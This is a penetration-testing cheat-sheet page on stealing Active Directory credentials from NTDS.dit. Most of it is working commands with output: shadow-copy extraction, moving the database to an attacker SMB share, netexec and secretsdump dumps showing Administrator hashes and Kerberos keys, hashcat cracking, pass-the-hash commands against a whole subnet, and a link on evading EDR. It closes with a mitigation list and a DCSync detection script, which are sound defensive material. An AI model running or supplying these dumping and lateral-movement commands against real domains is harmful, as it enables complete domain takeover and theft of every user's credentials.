# NTDS secrets

{% hint style="info" %}
*Requires Domain Admin, or equivalent rights: replication privileges (DCSync), or membership of a group such as Backup Operators or Server Operators that can log on to a domain controller and read NTDS.dit*
{% endhint %}

## Shadow copy of c:\ - VSS

```shell-session
*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
```

```shell-session
*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

        1 file(s) copied.
```

NTDS.dit on its own cannot be decrypted: the hashes it holds are protected with the boot key stored in the SYSTEM registry hive, so save that hive as well (`reg save HKLM\SYSTEM C:\NTDS\SYSTEM`), transfer both files and parse them offline with secretsdump.py (`-ntds NTDS.dit -system SYSTEM LOCAL`). Transfer over SMB - see [SAM & LSA secrets](/0xss0rz/pentest/internal-pentest/sam-and-lsa-secrets.md) to launch an SMB server, or [File transfer - Download - Exfiltration](/0xss0rz/pentest/file-transfer/download-exfiltration.md)

```shell-session
*Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData

        1 file(s) moved.
```

## Netexec - CME

{% embed url="<https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit>" %}

```
2 methods are available:
  (default) drsuapi - uses the drsuapi RPC interface to create a handle, trigger replication and,
                      combined with additional drsuapi calls, convert the resulting linked lists
                      into a readable format
            vss     - uses the Volume Shadow Copy Service (copies NTDS.dit and SYSTEM from a shadow copy)
```

```
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
```

You can also DCSync with the DC's own computer account (its NT hash or a Kerberos ticket), since domain controllers hold the replication rights the drsuapi method requires:

{% content-ref url="/pages/xnKTwmiIoj8HdMcJZAjp" %}
[DCSync](/0xss0rz/pentest/internal-pentest/dcsync.md)
{% endcontent-ref %}

There is also the `ntdsutil` module, which runs ntdsutil on the DC to dump NTDS.dit together with the SYSTEM hive, retrieves both files and parses them locally with secretsdump.py:

```
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil
```

## Secretsdump

```
$ secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator

Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43
Administrator:aes128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a
Administrator:des-cbc-md5:d60dfbbf20548938
[*] Cleaning up...
```

## Cracking - Hashes

{% content-ref url="/pages/5HMI5x51XIr5GBqw1pWM" %}
[Hashes](/0xss0rz/pentest/cracking/hashes.md)
{% endcontent-ref %}

{% content-ref url="/pages/UCKTmqsQ8EinRrV2OMwg" %}
[Domain Password Audit Tools](/0xss0rz/pentest/internal-pentest/domain-password-audit-tools.md)
{% endcontent-ref %}

The dumped hashes are NT hashes (hashcat mode 1000):

```shell-session
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
```

## Backup Operators Group

```
whoami /groups
```

Members hold SeBackupPrivilege and SeRestorePrivilege, which let them read any file regardless of its ACL (enough to copy NTDS.dit from a shadow copy and save the SYSTEM hive), and the group also permits logging on locally to a domain controller.

{% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %}
[Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md)
{% endcontent-ref %}

## Server Operators Group

Server Operators is a highly privileged group whose members can log on locally to servers, including Domain Controllers.

{% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %}
[Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md)
{% endcontent-ref %}

## Pass the Hash (PtH)

{% content-ref url="/pages/2nk7AOHO745kf6QdjHnB" %}
[Pass the Hash (PtH)](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md)
{% endcontent-ref %}

### Evil-WinRM

```shell-session
evil-winrm -i 10.129.201.57  -u  Administrator -H "64f12cddaa88057e06a81b54e73b949b"
```

### Netexec - CME

```
nxc smb [IP] -u USERNAME -H :NT_HASH
```

After obtaining credentials such as `Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::` you can pass either the full `LM:NT` pair or just the NT hash (the second half). `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty password: it appears for every account when LM hash storage is disabled (the default) and has no cracking value.

```
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
```

### Metasploit

{% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %}
[Metasploit](/0xss0rz/pentest/tools/metasploit.md)
{% endcontent-ref %}

## Bypass EDR

{% embed url="<https://medium.com/@0xcc00/bypassing-edr-ntds-dit-protection-using-blueteam-tools-1d161a554f9f>" %}

## Mitigation

The following security controls should be implemented to mitigate dumping ntds.dit:

* **Limit access to Domain Controllers to only privileged users that require access.** This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.
* **Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration.** Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘[Enterprise Access Model](https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model)’.
* **Encrypt and securely store backups of Domain Controllers and limit access to only Backup Administrators.** Backups of Domain Controllers need to be afforded the same security as the actual Domain Controllers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as Domain Controllers.
* **Only use Domain Controllers for AD DS and do not install any non-security-related services or applications.** This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.
* **Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity.** Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.
* **Disable the Print Spooler service on Domain Controllers.** For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to coerce authentication to a system they control and collect the Domain Controller's computer account password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.
* **Disable the Server Message Block (SMB) version 1 protocol on Domain Controllers.** There are multiple Active Directory compromises that leverage weaknesses in the SMBv1 protocol to gain access to systems, including Domain Controllers. Disabling SMBv1 on Domain Controllers and on all systems in a domain mitigates compromises that leverage the SMBv1 protocol.

<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03>
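The "centrally log and analyse Domain Controller logs" control only pays off if something actually looks for the replication calls the drsuapi method above makes. The detection below is an added example, not code from this page or from any tool it lists: it runs over Security event 4662 records (logged when "Audit Directory Service Access" is enabled on the DCs) and alerts when an account that is not a domain controller exercises one of the DS-Replication control-access rights. Event ID 4662, the Control Access mask bit and the three rights GUIDs are the standard Windows values; the domain, hosts, account names and the records in `SAMPLE_EVENTS` are constructed for the example.

```python
"""Flag DRSUAPI replication requests (DCSync-style dumping) made by accounts that are not DCs.

Added example for the "centrally log and analyse Domain Controller logs" control; it is
not code from the page or from any tool it lists. Security event 4662 and the three
control-access GUIDs are the standard values Windows logs when "Audit Directory Service
Access" is enabled on the domain controllers; the accounts, hosts and events in
SAMPLE_EVENTS are constructed for the example.
"""
import re

# Extended rights a replication caller must hold; the first two are what nxc --ntds and
# secretsdump exercise with the default drsuapi method.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
_GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # AccessMask bit: the extended right named in Properties was exercised


def replication_rights(properties):
    """Names of the replication rights listed in a 4662 Properties field (GUIDs in braces)."""
    return sorted(
        REPLICATION_RIGHTS[g.lower()]
        for g in _GUID_RE.findall(properties)
        if g.lower() in REPLICATION_RIGHTS
    )


def detect_dcsync(events, allowed_accounts):
    """One alert per 4662 event in which a non-allow-listed account exercised a replication right.

    `allowed_accounts` holds the DC machine accounts (DC01$, ...) plus any account that
    legitimately replicates, such as an Entra Connect / AAD Connect sync account, and is
    compared case-insensitively. Everything else requesting these rights is a finding.
    """
    allowed = {a.upper() for a in allowed_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights or ev.get("SubjectUserName", "").upper() in allowed:
            continue
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{ev['SubjectUserName']}",
            "rights": rights,
            "logged_by": ev.get("Computer"),
            "time": ev.get("TimeCreated"),
        })
    return alerts


# Constructed records in the shape of parsed Security-log EventData (domain LAB, hosts assumed).
_REPL_BOTH = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    # normal DC-to-DC replication
    {"EventID": 4662, "TimeCreated": "2024-05-01T09:00:01Z", "Computer": "DC01.lab.local",
     "SubjectDomainName": "LAB", "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": _REPL_BOTH},
    # unrelated logon event
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:03:10Z", "Computer": "DC01.lab.local",
     "SubjectDomainName": "LAB", "SubjectUserName": "jdoe"},
    # 4662 on a user object class GUID, not a replication right
    {"EventID": 4662, "TimeCreated": "2024-05-01T09:04:12Z", "Computer": "DC01.lab.local",
     "SubjectDomainName": "LAB", "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # a service account pulling the whole directory: what nxc --ntds / secretsdump look like
    {"EventID": 4662, "TimeCreated": "2024-05-01T09:05:33Z", "Computer": "DC01.lab.local",
     "SubjectDomainName": "LAB", "SubjectUserName": "svc_backup", "AccessMask": "0x100",
     "Properties": _REPL_BOTH},
    # a sync account that is expected to replicate, alert or not depending on the allow list
    {"EventID": 4662, "TimeCreated": "2024-05-01T09:07:45Z", "Computer": "DC01.lab.local",
     "SubjectDomainName": "LAB", "SubjectUserName": "MSOL_sync", "AccessMask": "0x100",
     "Properties": _REPL_BOTH},
]
DC_ACCOUNTS = ["DC01$", "DC02$"]
ALLOWED_REPLICATORS = DC_ACCOUNTS + ["MSOL_sync"]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, ALLOWED_REPLICATORS):
        print(alert)
```

With only the DC accounts allow-listed the sample yields two alerts (`svc_backup` and the sync account); adding the sync account to the allow list leaves the `svc_backup` replication request as the single finding. Keep the allow list short and reviewed: every account on it can dump the domain exactly as this page describes.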

## Resources

{% embed url="<https://www.thehacker.recipes/a-d/movement/credentials/dumping/ntds>" %}

{% embed url="<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration>" %}


